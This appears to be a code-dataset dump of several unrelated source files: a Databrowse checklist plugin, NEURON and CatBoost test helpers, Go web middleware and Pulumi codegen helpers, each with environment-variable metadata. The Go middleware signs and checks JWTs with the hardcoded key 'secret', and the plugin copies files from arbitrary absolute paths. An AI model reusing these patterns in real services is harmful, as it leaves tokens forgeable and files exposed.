databrowse/plugins/db_limatix_qautils_editor/db_limatix_qautils_editor.py | #!/usr/bin/env python
###############################################################################
## Databrowse: An Extensible Data Management Platform ##
## Copyright (C) 2012-2016 Iowa State University Research Foundation, Inc. ##
## All rights reserved. ##
## ##
## Redistribution and use in source and binary forms, with or without ##
## modification, are permitted provided that the following conditions are ##
## met: ##
## 1. Redistributions of source code must retain the above copyright ##
## notice, this list of conditions and the following disclaimer. ##
## 2. Redistributions in binary form must reproduce the above copyright ##
## notice, this list of conditions and the following disclaimer in the ##
## documentation and/or other materials provided with the distribution. ##
## 3. Neither the name of the copyright holder nor the names of its ##
## contributors may be used to endorse or promote products derived from ##
## this software without specific prior written permission. ##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ##
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED ##
## TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A ##
## PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER ##
## OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, ##
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, ##
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR ##
## PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF ##
## LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING ##
## NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS ##
## SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ##
## ##
## This material is based on work supported by the Air Force Research ##
## Laboratory under Contract #FA8650-10-D-5210, Task Order #023 and ##
## performed at Iowa State University. ##
## ##
## DISTRIBUTION A. Approved for public release: distribution unlimited; ##
## 19 Aug 2016; 88ABW-2016-4051. ##
## ##
## This material is based on work supported by NASA under Contract ##
## NNX16CL31C and performed by Iowa State University as a subcontractor ##
## to TRI Austin. ##
## ##
## Approved for public release by TRI Austin: distribution unlimited; ##
## 01 June 2018; by Carl W. Magnuson (NDE Division Director). ##
###############################################################################
""" plugins/renderers/db_checklist_chx.py - Generic Checklist Files """
import os
import os.path
from lxml import etree
from databrowse.support.renderer_support import renderer_class
import subprocess
import shutil
import tempfile
import sys
import imp
class db_limatix_qautils_editor(renderer_class):
""" Generic Checklist Files """
_namespace_uri = "http://limatix.org/databrowse/checklist"
_namespace_local = "checklist"
_default_content_mode = "full"
_default_style_mode = "fill_out_checklist"
_default_recursion_depth = 2
def getContent(self):
if self._caller != "databrowse":
return None
else:
if "ajax" in self._web_support.req.form and "save" in self._web_support.req.form and self._style_mode == "fill_out_checklist":
if "filename" in self._web_support.req.form and "destination" in self._web_support.req.form and "file" in self._web_support.req.form:
filename = self._web_support.req.form["filename"].value
destination = self._web_support.req.form["destination"].value
filestring = self._web_support.req.form["file"].value
if destination.startswith('/'):
fullpath = os.path.abspath(destination)
else:
fullpath = os.path.abspath(self._web_support.dataroot + "/" + destination)
fullfilename = os.path.abspath(fullpath + "/" + filename)
fullpath = os.path.dirname(fullfilename)
if filename == "":
self._web_support.req.output = "Error Saving File: Filename Cannot Be Blank"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
if os.path.exists(fullfilename) and os.path.isdir(fullfilename):
self._web_support.req.output = "Error Saving File: Full Path '%s' is an Existing Directory" % fullfilename
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
if not fullpath.startswith(os.path.normpath(self._web_support.dataroot)):
self._web_support.req.output = "Error Saving File: Attempt to Save File Outside of Dataroot"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
# Let's check on the directory and make sure its writable and it exists
if not os.access(fullpath, os.W_OK) and os.path.exists(fullpath):
self._web_support.req.output = "Error Saving File: Save Directory Not Writable " + fullpath
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif not os.path.exists(fullpath):
try:
os.makedirs(fullpath)
except:
self._web_support.req.output = "Error Saving File: Unable to Create Directory " + fullpath
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
pass
elif not os.path.isdir(fullpath):
self._web_support.req.output = "Error Saving File: Requested Save Directory is an Existing File " + fullpath
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
#Let's check on the file and make sure its writable and doesn't exist
if os.path.exists(fullfilename):
# rename old version into .1 .2. .3 etc.
filenum = 1
while os.path.exists("%s.%.2d" % (fullfilename, filenum)):
filenum += 1
pass
os.rename(fullfilename, "%s.%.2d" % (fullfilename, filenum))
pass
f = open(fullfilename, "wb")
f.write(filestring)
                    f.close()
self._web_support.req.output = "File Saved Successfully"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
else:
self._web_support.req.output = "Error Saving File: Incomplete Request"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif "ajax" in self._web_support.req.form and "pdf" in self._web_support.req.form:
if all(k in self._web_support.req.form for k in ("file", "specimen", "perfby", "date", "dest")):
filestring = self._web_support.req.form["file"].value
if 'filename' in self._web_support.req.form:
upfilename = self._web_support.req.form["filename"].value
else:
upfilename = "chxfromweb.chx"
filename = os.path.splitext(upfilename)[0]
(filedir,filename_nodir)=os.path.split(filename)
                    # tempfile.mkdtemp creates the directory itself and avoids the
                    # racy, deprecated os.tempnam
                    tempsavedir = tempfile.mkdtemp(prefix="dbchx")
                    fullfilename = os.path.join(tempsavedir, filename_nodir + ".chx")
                    os.chdir(tempsavedir)
chxparsed = etree.XML(filestring)
imagelist = chxparsed.xpath("//chx:checklist/chx:checkitem/chx:parameter[@name='image']", namespaces={"chx": "http://limatix.org/checklist"})
for image in imagelist:
if image.text is not None:
image = image.text
elif image.get('{http://www.w3.org/1999/xlink}href') is not None:
image = image.get('{http://www.w3.org/1999/xlink}href')
else:
continue
image = image.translate(None, "\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f")
image = image.strip()
if image.startswith('/'):
imagepath = image
else:
imagepath = os.path.abspath(os.path.dirname(self._fullpath) + '/' + image)
try:
shutil.copy(imagepath, tempsavedir)
except:
pass
f = open(fullfilename, "wb")
f.write(filestring)
f.close()
try:
os.environ["HOME"] = "/home/www/.home"
os.environ["PATH"] = os.environ["PATH"] + ':/usr/local/bin'
chx2pdf = imp.load_source("chx2pdf", os.path.join(self._web_support.limatix_qautils, "bin/chx2pdf"))
chx2pdf.chx2pdf(fullfilename)
except Exception as err:
self._web_support.req.output = "Error Generating PDF: " + str(err)
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
try:
f = open(os.path.join(tempsavedir, filename_nodir + ".pdf"), 'rb')
self._web_support.req.response_headers['Content-Type'] = 'application/pdf'
self._web_support.req.response_headers['Content-Length'] = str(self.getSize(os.path.join(tempsavedir, filename_nodir + ".pdf")))
self._web_support.req.response_headers['Content-Disposition'] = "attachment; filename=" + filename + ".pdf"
self._web_support.req.start_response(self._web_support.req.status, self._web_support.req.response_headers.items())
self._web_support.req.output_done = True
if 'wsgi.file_wrapper' in self._web_support.req.environ:
return self._web_support.req.environ['wsgi.file_wrapper'](f, 1024)
else:
return iter(lambda: f.read(1024), '')
except Exception as err:
self._web_support.req.output = "Error Generating PDF: " + err
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
else:
self._web_support.req.output = "Error Generating PDF: Incomplete Request"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif "ajax" in self._web_support.req.form and "save" in self._web_support.req.form and self._style_mode == "edit_checklist":
if "file" in self._web_support.req.form:
filestring = self._web_support.req.form["file"].value
fullfilename = self._fullpath
# Let's check on the directory and make sure its writable and it exists
if not os.access(os.path.dirname(fullfilename), os.W_OK):
self._web_support.req.output = "Error Saving File: Save Directory Not Writable " + os.path.dirname(fullfilename)
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif not os.access(fullfilename, os.W_OK):
self._web_support.req.output = "Error Saving File: File Not Writable " + fullfilename
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
else:
#Let's check on the file and make sure its writable and doesn't exist
if os.path.exists(fullfilename):
# rename old version into .1 .2. .3 etc.
filenum = 1
while os.path.exists("%s.bak.%.2d" % (fullfilename, filenum)):
filenum += 1
pass
os.rename(fullfilename, "%s.bak.%.2d" % (fullfilename, filenum))
pass
f = open(fullfilename, "wb")
f.write(filestring)
                    f.close()
self._web_support.req.output = "File Saved Successfully"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
pass
else:
self._web_support.req.output = "Error Saving File: Incomplete Request"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif self._content_mode == "full" and self._style_mode == "fill_out_checklist":
#etree.register_namespace("chx", "http://limatix.org/checklist")
f = open(self._fullpath, 'r')
xml = etree.parse(f)
f.close()
g = open(os.path.join(self._web_support.limatix_qautils, 'checklist/chx2html.xsl'), 'r')
xsltransform = etree.parse(g)
g.close()
transform = etree.XSLT(xsltransform)
if "dest" in self._web_support.req.form:
transformedxml = transform(xml, dest=etree.XSLT.strparam(self._web_support.req.form['dest'].value))
else:
transformedxml = transform(xml)
xmloutput = etree.XML(str(transformedxml))
return xmloutput
elif self._content_mode == "full" and self._style_mode =="edit_checklist":
f = open(self._fullpath, 'r')
xml = etree.parse(f)
f.close()
xmlroot = xml.getroot()
templatefile = self.getURL("/SOPs/.src/checklist.xhtml", handler="db_default", content_mode="raw", ContentType="application/xml")
xmlroot.set("templatefile", templatefile)
return xmlroot
else:
raise self.RendererException("Invalid Content Mode")
pass
| [] | [] | [
"HOME",
"PATH"
] | [] | ["HOME", "PATH"] | python | 2 | 0 | |
thinkInJava4/src/main/java/enumerated/ConstantSpecificMethod.java | //: enumerated/ConstantSpecificMethod.java
import java.util.*;
import java.text.*;
public enum ConstantSpecificMethod {
DATE_TIME {
String getInfo() {
return
DateFormat.getDateInstance().format(new Date());
}
},
CLASSPATH {
String getInfo() {
return System.getenv("CLASSPATH");
}
},
VERSION {
String getInfo() {
return System.getProperty("java.version");
}
};
abstract String getInfo();
public static void main(String[] args) {
for(ConstantSpecificMethod csm : values())
System.out.println(csm.getInfo());
}
} /* (Execute to see output) *///:~
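// Illustrative output (actual values depend on the environment; CLASSPATH
// prints "null" when the variable is unset):
//   Feb 1, 2024
//   /usr/local/classes
//   1.8.0_201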
| [
"\"CLASSPATH\""
] | [] | [
"CLASSPATH"
] | [] | ["CLASSPATH"] | java | 1 | 0 | |
test/coreneuron/test_spikes.py | import os
import pytest
# Hacky, but it's non-trivial to pass commandline arguments to pytest tests.
mpi4py_option = bool(os.environ.get('NRN_TEST_SPIKES_MPI4PY', ''))
file_mode_option = bool(os.environ.get('NRN_TEST_SPIKES_FILE_MODE', ''))
nrnmpi_init_option = bool(os.environ.get('NRN_TEST_SPIKES_NRNMPI_INIT', ''))
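# Example (assumed) invocation: NRN_TEST_SPIKES_MPI4PY=1 pytest test_spikes.py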
def test_spikes(use_mpi4py=mpi4py_option, use_nrnmpi_init=nrnmpi_init_option,
file_mode=file_mode_option):
print("test_spikes(use_mpi4py={}, use_nrnmpi_init={}, file_mode={})".format(
use_mpi4py, use_nrnmpi_init, file_mode))
    # mpi4py needs to be imported before importing h
if use_mpi4py:
from mpi4py import MPI
from neuron import h, gui
# without mpi4py we need to call nrnmpi_init explicitly
elif use_nrnmpi_init:
from neuron import h, gui
h.nrnmpi_init()
# otherwise serial execution
else:
from neuron import h, gui
h('''create soma''')
h.soma.L = 5.6419
h.soma.diam = 5.6419
h.soma.insert("hh")
h.soma.nseg = 3
ic = h.IClamp(h.soma(.25))
ic.delay = .1
ic.dur = 0.1
ic.amp = 0.3
ic2 = h.IClamp(h.soma(.75))
ic2.delay = 5.5
ic2.dur = 1
ic2.amp = 0.3
h.tstop = 10
h.cvode.use_fast_imem(1)
h.cvode.cache_efficient(1)
pc = h.ParallelContext()
pc.set_gid2node(pc.id() + 1, pc.id())
myobj = h.NetCon(h.soma(0.5)._ref_v, None, sec=h.soma)
pc.cell(pc.id() + 1, myobj)
# NEURON run
nrn_spike_t = h.Vector()
nrn_spike_gids = h.Vector()
# rank 0 record spikes for all gid while others
# for specific gid. this is for better test coverage.
pc.spike_record(-1 if pc.id() == 0 else (pc.id() + 1), nrn_spike_t, nrn_spike_gids)
h.run()
nrn_spike_t = nrn_spike_t.to_python()
nrn_spike_gids = nrn_spike_gids.to_python()
# CORENEURON run
from neuron import coreneuron
coreneuron.enable = True
coreneuron.gpu = bool(os.environ.get('CORENRN_ENABLE_GPU', ''))
coreneuron.file_mode = file_mode
coreneuron.verbose = 0
h.stdinit()
corenrn_all_spike_t = h.Vector()
corenrn_all_spike_gids = h.Vector()
pc.spike_record(-1, corenrn_all_spike_t, corenrn_all_spike_gids)
pc.psolve(h.tstop)
corenrn_all_spike_t = corenrn_all_spike_t.to_python()
corenrn_all_spike_gids = corenrn_all_spike_gids.to_python()
# check spikes match
assert(len(nrn_spike_t)) # check we've actually got spikes
assert(len(nrn_spike_t) == len(nrn_spike_gids)) # matching no. of gids
assert(nrn_spike_t == corenrn_all_spike_t)
assert(nrn_spike_gids == corenrn_all_spike_gids)
h.quit()
if __name__ == "__main__":
test_spikes()
| [] | [] | [
"NRN_TEST_SPIKES_MPI4PY",
"NRN_TEST_SPIKES_FILE_MODE",
"CORENRN_ENABLE_GPU",
"NRN_TEST_SPIKES_NRNMPI_INIT"
] | [] | ["NRN_TEST_SPIKES_MPI4PY", "NRN_TEST_SPIKES_FILE_MODE", "CORENRN_ENABLE_GPU", "NRN_TEST_SPIKES_NRNMPI_INIT"] | python | 4 | 0 | |
lib-go/env.go | package aoc
import (
"os"
)
func DEBUG() bool {
return os.Getenv("AoC_DEBUG") != ""
}
| [
"\"AoC_DEBUG\""
] | [] | [
"AoC_DEBUG"
] | [] | ["AoC_DEBUG"] | go | 1 | 0 | |
catboost/pytest/lib/common_helpers.py | import csv
import json
import os
import random
import shutil
from copy import deepcopy
import numpy as np
__all__ = [
'DelayedTee',
'binary_path',
'compare_evals',
'compare_evals_with_precision',
'compare_metrics_with_diff',
'generate_random_labeled_set',
'permute_dataset_columns',
'remove_time_from_json',
'test_output_path',
]
try:
import yatest
binary_path = yatest.common.binary_path
test_output_path = yatest.common.test_output_path
except ImportError:
def binary_path(*path):
return os.path.join(os.environ["BINARY_PATH"], *path)
def test_output_path(*path):
return os.path.join(os.getcwd(), *path)
def remove_time_from_json(filename):
with open(filename) as f:
log = json.load(f)
iterations = log['iterations']
for i, iter_info in enumerate(iterations):
for key in ['remaining_time', 'passed_time']:
if key in iter_info.keys():
del iter_info[key]
with open(filename, 'w') as f:
json.dump(log, f, sort_keys=True)
return filename
# rewinds dst_stream to the start of the captured output so you can read it
class DelayedTee(object):
def __init__(self, src_stream, dst_stream):
self.src_stream = src_stream
self.dst_stream = dst_stream
def __enter__(self):
self.src_stream.flush()
self._old_src_stream = os.dup(self.src_stream.fileno())
self._old_dst_stream_pos = self.dst_stream.tell()
os.dup2(self.dst_stream.fileno(), self.src_stream.fileno())
def __exit__(self, exc_type, exc_value, traceback):
self.src_stream.flush()
os.dup2(self._old_src_stream, self.src_stream.fileno())
self.dst_stream.seek(self._old_dst_stream_pos)
shutil.copyfileobj(self.dst_stream, self.src_stream)
self.dst_stream.seek(self._old_dst_stream_pos)
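# Illustrative DelayedTee usage (names are hypothetical); the destination stream
# must be opened readable (e.g. 'w+') so the captured output can be replayed:
#
#   with open(test_output_path('captured.txt'), 'w+') as buf:
#       with DelayedTee(sys.stdout, buf):
#           noisy_function()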
def permute_dataset_columns(test_pool_path, cd_path, seed=123):
permuted_test_path = test_output_path('permuted_test')
permuted_cd_path = test_output_path('permuted_cd')
generator = random.Random(seed)
column_count = len(open(test_pool_path).readline().split('\t'))
permutation = list(range(column_count))
generator.shuffle(permutation)
with open(cd_path) as original_cd, open(permuted_cd_path, 'w') as permuted_cd:
for line in original_cd:
line = line.strip()
if not line:
continue
index, rest = line.split('\t', 1)
permuted_cd.write('{}\t{}\n'.format(permutation.index(int(index)), rest))
with open(test_pool_path) as test_pool, open(permuted_test_path, 'w') as permuted_test:
for line in test_pool:
splitted = line.strip().split('\t')
permuted_test.write('\t'.join([splitted[i] for i in permutation]) + '\n')
return permuted_test_path, permuted_cd_path
def generate_random_labeled_set(nrows, nvals, labels, seed=20181219, prng=None):
if prng is None:
prng = np.random.RandomState(seed=seed)
label = prng.choice(labels, [nrows, 1])
feature = prng.random_sample([nrows, nvals])
return np.concatenate([label, feature], axis=1)
BY_CLASS_METRICS = ['AUC', 'Precision', 'Recall', 'F1']
def compare_metrics_with_diff(custom_metric, fit_eval, calc_eval, eps=1e-7):
csv_fit = csv.reader(open(fit_eval, "r"), dialect='excel-tab')
csv_calc = csv.reader(open(calc_eval, "r"), dialect='excel-tab')
head_fit = next(csv_fit)
head_calc = next(csv_calc)
if isinstance(custom_metric, basestring):
custom_metric = [custom_metric]
for metric_name in deepcopy(custom_metric):
if metric_name in BY_CLASS_METRICS:
custom_metric.remove(metric_name)
for fit_metric_name in head_fit:
if fit_metric_name[:len(metric_name)] == metric_name:
custom_metric.append(fit_metric_name)
col_idx_fit = {}
col_idx_calc = {}
for metric_name in custom_metric:
col_idx_fit[metric_name] = head_fit.index(metric_name)
col_idx_calc[metric_name] = head_calc.index(metric_name)
while True:
try:
line_fit = next(csv_fit)
line_calc = next(csv_calc)
for metric_name in custom_metric:
fit_value = float(line_fit[col_idx_fit[metric_name]])
calc_value = float(line_calc[col_idx_calc[metric_name]])
max_abs = max(abs(fit_value), abs(calc_value))
err = abs(fit_value - calc_value) / max_abs if max_abs > 0 else 0
if err > eps:
raise Exception('{}, iter {}: fit vs calc = {} vs {}, err = {} > eps = {}'.format(
metric_name, line_fit[0], fit_value, calc_value, err, eps))
except StopIteration:
break
def compare_evals(fit_eval, calc_eval):
csv_fit = csv.reader(open(fit_eval, "r"), dialect='excel-tab')
csv_calc = csv.reader(open(calc_eval, "r"), dialect='excel-tab')
while True:
try:
line_fit = next(csv_fit)
line_calc = next(csv_calc)
if line_fit[:-1] != line_calc:
return False
except StopIteration:
break
return True
def compare_evals_with_precision(fit_eval, calc_eval, rtol=1e-6, skip_last_column_in_fit=True):
array_fit = np.loadtxt(fit_eval, delimiter='\t', skiprows=1, ndmin=2)
array_calc = np.loadtxt(calc_eval, delimiter='\t', skiprows=1, ndmin=2)
header_fit = open(fit_eval, "r").readline().split()
header_calc = open(calc_eval, "r").readline().split()
if skip_last_column_in_fit:
array_fit = np.delete(array_fit, np.s_[-1], 1)
header_fit = header_fit[:-1]
if header_fit != header_calc:
return False
return np.all(np.isclose(array_fit, array_calc, rtol=rtol))
| [] | [] | [
"BINARY_PATH"
] | [] | ["BINARY_PATH"] | python | 1 | 0 | |
utils.go | package main
import (
"errors"
"fmt"
"os"
)
func panic_the_err(err error) {
if err != nil {
fmt.Fprintf(os.Stderr, "ERROR: %s\n", err)
os.Exit(1)
}
}
func ensure_directory(path string) {
if path == "" {
panic(errors.New("Can't ensure empty string as a directory!"))
}
err := os.MkdirAll(path, 0755)
panic_the_err(err)
}
func getRootPath() string {
home := os.Getenv("HOME")
rootPath := home + "/.credulous"
os.MkdirAll(rootPath, 0700)
return rootPath
}
| [
"\"HOME\""
] | [] | [
"HOME"
] | [] | ["HOME"] | go | 1 | 0 | |
api/middleware.go | package api
import (
"fmt"
"net/http"
"os"
"reflect"
"strings"
"github.com/bigokro/gruff-server/gruff"
"github.com/bigokro/gruff-server/support"
jwt "github.com/dgrijalva/jwt-go"
"github.com/jinzhu/gorm"
"github.com/labstack/echo"
uuid "github.com/satori/go.uuid"
)
var RW_DB_POOL *gorm.DB
const (
HeaderReferrerPolicy = "Referrer-Policy"
)
type securityMiddlewareOption func(*echo.Response)
func ReferrerPolicy(p string) securityMiddlewareOption {
return func(r *echo.Response) {
r.Header().Set(HeaderReferrerPolicy, p)
}
}
func Secure(headers ...securityMiddlewareOption) echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
res := c.Response()
for _, m := range headers {
m(res)
}
return next(c)
}
}
}
func DBMiddleware(db *gorm.DB) echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
c.Set("Database", db)
return next(c)
}
}
}
func InitializePayload(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
c.Set("Payload", make(map[string]interface{}))
c.Set("AppName", fmt.Sprintf("%s-%s", os.Getenv("GRUFF_NAME"), os.Getenv("GRUFF_ENV")))
c.Set("RequestID", uuid.NewV4().String())
c.Set("Method", c.Request().Method)
c.Set("Endpoint", fmt.Sprintf("%s %s", c.Request().Method, c.Request().URL.Path))
c.Set("Path", c.Request().URL.String())
return next(c)
}
}
func SettingHeaders(test bool) echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
if !test {
xGruff := c.Request().Header.Get("X-Gruff")
if xGruff != "Gruff" {
return echo.NewHTTPError(http.StatusUnauthorized)
}
}
return next(c)
}
}
}
func SessionUser(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
user := gruff.User{}
auth := strings.Split(c.Request().Header.Get("Authorization"), " ")
if len(auth) != 1 {
		token, err := jwt.ParseWithClaims(auth[1], &jwtCustomClaims{}, func(token *jwt.Token) (interface{}, error) {
			return []byte("secret"), nil
		})
		// Guard against a nil or invalid token (e.g. a malformed header)
		// before reading claims.
		if err == nil && token != nil && token.Valid {
			if claims, ok := token.Claims.(*jwtCustomClaims); ok {
				user.ID = claims.ID
				user.Name = claims.Name
				user.Email = claims.Email
				user.Username = claims.Username
				user.Image = claims.Image
				user.Curator = claims.Curator
				user.Admin = claims.Admin
			} else {
				user.ID = 0
			}
		} else {
			user.ID = 0
		}
} else {
user.ID = 0
}
c.Set("UserContext", user)
return next(c)
}
}
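// SessionUser expects the conventional bearer format, e.g. (illustrative):
//
//	Authorization: Bearer <JWT signed with the "secret" key above>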
func DetermineType(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
var tType reflect.Type
var parentType reflect.Type
parts := PathParts(c.Path())
var pathType string
for i := 0; i < len(parts); i++ {
pathType = parts[i]
t := StringToType(pathType)
if t != nil {
if tType != nil {
parentType = tType
}
tType = t
}
}
c.Set("ParentType", parentType)
c.Set("Type", tType)
return next(c)
}
}
func AssociationFieldNameFromPath(c echo.Context) string {
var tType reflect.Type
if c.Get("Type") != nil {
tType = c.Get("Type").(reflect.Type)
}
path := c.Path()
parts := strings.Split(path, "/")
associationPath := ""
for _, part := range parts {
if StringToType(part) == tType {
associationPath = part
}
}
associationName := support.SnakeToCamel(associationPath)
return associationName
}
func PathParts(path string) []string {
parts := strings.Split(strings.Trim(path, " /"), "/")
return parts
}
func StringToType(typeName string) (t reflect.Type) {
switch typeName {
case "users":
var m gruff.User
t = reflect.TypeOf(m)
case "claims":
var m gruff.Claim
t = reflect.TypeOf(m)
case "claim_opinions":
var m gruff.ClaimOpinion
t = reflect.TypeOf(m)
case "arguments":
var m gruff.Argument
t = reflect.TypeOf(m)
case "argument_opinions":
var m gruff.ArgumentOpinion
t = reflect.TypeOf(m)
case "contexts":
var m gruff.Context
t = reflect.TypeOf(m)
case "links":
var m gruff.Link
t = reflect.TypeOf(m)
case "tags":
var m gruff.Tag
t = reflect.TypeOf(m)
case "values":
var m gruff.Value
t = reflect.TypeOf(m)
}
return
}
func ServerContext(c echo.Context) *gruff.ServerContext {
var tType reflect.Type
var ParentType reflect.Type
var user gruff.User
if c.Get("UserContext") != nil {
user = c.Get("UserContext").(gruff.User)
}
if c.Get("Type") != nil {
tType = c.Get("Type").(reflect.Type)
}
if c.Get("ParentType") != nil {
ParentType = c.Get("ParentType").(reflect.Type)
}
return &gruff.ServerContext{
RequestID: c.Get("RequestID").(string),
Database: c.Get("Database").(*gorm.DB),
UserContext: user,
Test: false,
Type: tType,
ParentType: ParentType,
Payload: make(map[string]interface{}),
}
}
// func (ctx *Context) ServerContext() gruff.ServerContext {
// return gruff.ServerContext{
// Database: ctx.Database,
// Test: false,
// }
// }
| [
"\"GRUFF_NAME\"",
"\"GRUFF_ENV\""
] | [] | [
"GRUFF_ENV",
"GRUFF_NAME"
] | [] | ["GRUFF_ENV", "GRUFF_NAME"] | go | 2 | 0 | |
server.go | package main
import (
"log"
"net/http"
"os"
"github.com/99designs/gqlgen/graphql/handler"
"github.com/99designs/gqlgen/graphql/playground"
"github.com/fashionscape/fsbot-api/graph"
"github.com/fashionscape/fsbot-api/graph/generated"
)
const defaultPort = "8080"
func main() {
port := os.Getenv("PORT")
if port == "" {
port = defaultPort
}
srv := handler.NewDefaultServer(generated.NewExecutableSchema(generated.Config{Resolvers: &graph.Resolver{}}))
http.Handle("/", playground.Handler("GraphQL playground", "/query"))
http.Handle("/query", srv)
log.Printf("connect to http://localhost:%s/ for GraphQL playground", port)
log.Fatal(http.ListenAndServe(":"+port, nil))
}
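// Example (assumed) invocation overriding the default port:
//
//	PORT=9090 go run server.go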
| [
"\"PORT\""
] | [] | [
"PORT"
] | [] | ["PORT"] | go | 1 | 0 | |
pkg/codegen/internal/test/helpers.go | // Copyright 2016-2021, Pulumi Corporation.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package test
import (
"bytes"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"net/http"
"os"
"path/filepath"
"sort"
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"gopkg.in/yaml.v3"
"github.com/pulumi/pulumi/pkg/v3/codegen/schema"
"github.com/pulumi/pulumi/pkg/v3/testing/integration"
"github.com/pulumi/pulumi/sdk/v3/go/common/util/executable"
)
// GenPkgSignature corresponds to the shape of the codegen GeneratePackage functions.
type GenPkgSignature func(string, *schema.Package, map[string][]byte) (map[string][]byte, error)
// GeneratePackageFilesFromSchema loads a schema and generates files using the provided GeneratePackage function.
func GeneratePackageFilesFromSchema(schemaPath string, genPackageFunc GenPkgSignature) (map[string][]byte, error) {
// Read in, decode, and import the schema.
schemaBytes, err := ioutil.ReadFile(schemaPath)
if err != nil {
return nil, err
}
ext := filepath.Ext(schemaPath)
var pkgSpec schema.PackageSpec
if ext == ".yaml" || ext == ".yml" {
err = yaml.Unmarshal(schemaBytes, &pkgSpec)
} else {
err = json.Unmarshal(schemaBytes, &pkgSpec)
}
if err != nil {
return nil, err
}
pkg, err := schema.ImportSpec(pkgSpec, nil)
if err != nil {
return nil, err
}
return genPackageFunc("test", pkg, nil)
}
// LoadFiles loads the provided list of files from a directory.
func LoadFiles(dir, lang string, files []string) (map[string][]byte, error) {
result := map[string][]byte{}
for _, file := range files {
fileBytes, err := ioutil.ReadFile(filepath.Join(dir, lang, file))
if err != nil {
return nil, err
}
result[file] = fileBytes
}
return result, nil
}
func PathExists(path string) (bool, error) {
_, err := os.Stat(path)
if os.IsNotExist(err) {
return false, nil
}
if err == nil {
return true, nil
}
return false, err
}
// `LoadBaseline` loads the contents of the given baseline directory,
// by inspecting its `codegen-manifest.json`.
func LoadBaseline(dir, lang string) (map[string][]byte, error) {
cm := &codegenManifest{}
err := cm.load(filepath.Join(dir, lang))
if err != nil {
return nil, fmt.Errorf("Failed to load codegen-manifest.json: %w", err)
}
files := make(map[string][]byte)
for _, f := range cm.EmittedFiles {
bytes, err := ioutil.ReadFile(filepath.Join(dir, lang, f))
if err != nil {
return nil, fmt.Errorf("Failed to load file %s referenced in codegen-manifest.json: %w", f, err)
}
files[f] = bytes
}
return files, nil
}
type codegenManifest struct {
EmittedFiles []string `json:"emittedFiles"`
}
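// An emitted codegen-manifest.json is of the form (illustrative):
//
//	{
//	  "emittedFiles": ["go.mod", "provider.go"]
//	}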
func (cm *codegenManifest) load(dir string) error {
bytes, err := ioutil.ReadFile(filepath.Join(dir, "codegen-manifest.json"))
if err != nil {
return err
}
return json.Unmarshal(bytes, cm)
}
func (cm *codegenManifest) save(dir string) error {
sort.Strings(cm.EmittedFiles)
buf := &bytes.Buffer{}
enc := json.NewEncoder(buf)
enc.SetIndent("", " ")
err := enc.Encode(cm)
if err != nil {
return err
}
data := buf.Bytes()
return ioutil.WriteFile(filepath.Join(dir, "codegen-manifest.json"), data, 0600)
}
// ValidateFileEquality compares maps of files for equality.
func ValidateFileEquality(t *testing.T, actual, expected map[string][]byte) bool {
ok := true
for name, file := range expected {
_, inActual := actual[name]
if inActual {
if !assert.Equal(t, string(file), string(actual[name]), name) {
t.Logf("%s did not agree", name)
ok = false
}
} else {
t.Logf("File %s was expected but is missing from the actual fileset", name)
ok = false
}
}
for name := range actual {
if _, inExpected := expected[name]; !inExpected {
